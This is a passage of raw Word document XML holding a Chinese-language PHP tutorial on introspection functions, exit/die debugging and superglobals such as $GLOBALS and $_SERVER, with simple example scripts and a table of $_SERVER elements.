          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>get_defined_constants(void)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="21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56"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="需要了解的超全局变量"/>
      <w:bookmarkStart w:id="6" w:name="_bookmark2"/>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>返回所有可用的常量，包含系统常量和用户定义的常量。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="14"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="776"/>
        </w:tabs>
        <w:ind w:right="2181" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>get_declared_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>classes(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">void) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>返回所有可用的类，包含系统类和用户定义的类。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="14"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="776"/>
        </w:tabs>
        <w:ind w:right="518" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">get_included_files() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>返回所有的包含的文件路径的数组，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>included</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-18"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-17"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>required</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-16"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>的包含文</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>件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3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">php </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>断点调试方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="18" w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="3263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 xml:space="preserve">3.1 exit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> die </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>输出一个消息并退出程序执行。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5"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>需要了解的超全局变量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="1" w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="421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 xml:space="preserve">PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>中的许多预定义变量都是“超全局的”，这意味着它们在一个脚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本的全部作用域中都可用。在函数或方法中无需执</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="342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行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> global $variable; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>就可以访问它们。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$GLOBALS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$_SERVER</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="361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$_REQUEST</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="361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$_POST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$_GET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$_FILES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$_ENV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$_COOKIE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="361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sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>$_SESSION</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:spacing w:line="361" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii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5"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="13"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="323" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="317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 xml:space="preserve">1 $GLOBALS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>—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引用全局作用域中可用的全部变量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="163" w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="49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$GLOBALS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这种全局变量用于在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脚本中的任意位置访问全局变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量（从函数或方法中均可）。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 xml:space="preserve">PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>在名为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> $</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>GLOBALS[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">index] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>的数组中存储了所有全局变量。变量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的名字就是数组的键。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="343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下面的例子展示了如何使用超级全局变量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> $GLOBALS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>：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实例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&lt;?php</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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$x = 75;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$y = 25;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function</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> addition() {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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>GLOBALS[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>'z'] = $GLOBALS['x'] + $GLOBALS['y'];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:w w:val="99"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="18" w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="5383"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>addition(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">); echo $z; ?&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>结果：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>95</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="324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在上面的例子中，由于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> z </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> $GLOBALS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>数组中的变量，因此在函数之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外也可以访问它。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3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2 $_SERVER</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="19" w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="48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 xml:space="preserve">$_SERVER </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>这种超全局变量保存关于报头、路径和脚本位置的信息。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下面的例子展示了如何使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> $_SERVER </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>中的某些元素：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="342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实例</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="18" w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="3263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&lt;?php</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> echo $_SERVER['PHP_SELF']; echo "&lt;br&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="342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$_SERVER['SERVER_NAME'];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"&lt;br&gt;";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$_SERVER['HTTP_HOST'];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="361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"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>&lt;br&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr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$_SERVER['HTTP_REFERER'];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr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56" w:line="361" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="2322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lastRenderedPageBreak/>
        <w:t>echo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> "&lt;br&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="2322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$_SERVER['HTTP_USER_AGENT'];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="2322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"&lt;br&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="2322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echo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> $_SERVER['SCRIPT_NAME'];?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="2322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运行结果：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="18" w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="2322"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">/example/php/demo_php_global_server.php </w:t>
      </w:r>
      <w:hyperlink r:id="rId9">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="微软雅黑"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>www.0day5.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="1839"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId10">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="微软雅黑"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>www.0day5.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId11">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="微软雅黑"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>http://www.0day5.com/tiy/s.asp?f=demo_php_global_server</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (K HTML, like Gec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>ko) Chrome/34.0.1847.137 Safari/537.36</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="343" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="2322"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>/example/php/demo_php_global_server.php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2"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:ind w:left="417" w:right="2322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下表列出了您能够在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> $_SERVER </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>中访问的最重要的元素：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="15"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableNormal"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="25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4016"/>
        <w:gridCol w:w="4206"/>
      </w:tblGrid>
      <w:tr w:rsidR="00292EF3">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="491"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4016" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
          </w:tcPr>
          <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="77"/>
              <w:ind w:left="654" w:right="654"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>元素</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>代码</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4206" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
          </w:tcPr>
          <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="77"/>
              <w:ind w:right="274"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>描述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$_SERVER['PHP_SELF']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返回当前执行脚本的文件名。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7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$_SERVER['GATEWAY_INTERFACE']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7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返回服务器使用的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> CGI </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>规范的版本。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$_SERVER['SERVER_ADDR']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返回当前运行脚本所在的服务器的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> IP </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>地址。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00292EF3">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="817"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4016" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          </w:tcPr>
          <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="15"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="0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$_SERVER['SERVER_NAME']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6" w:line="302" w:lineRule="auto"/>
              <w:ind w:left="1043" w:right="597" w:hanging="449"/>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:w w:val="95"/>
                <w:sz w:val="15"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>返回当前运行脚本所在的服务器的主机名（比</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:w w:val="95"/>
                <w:sz w:val="15"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>如</w:t>
            </w:r>
            <w:r>
              <w:rPr>
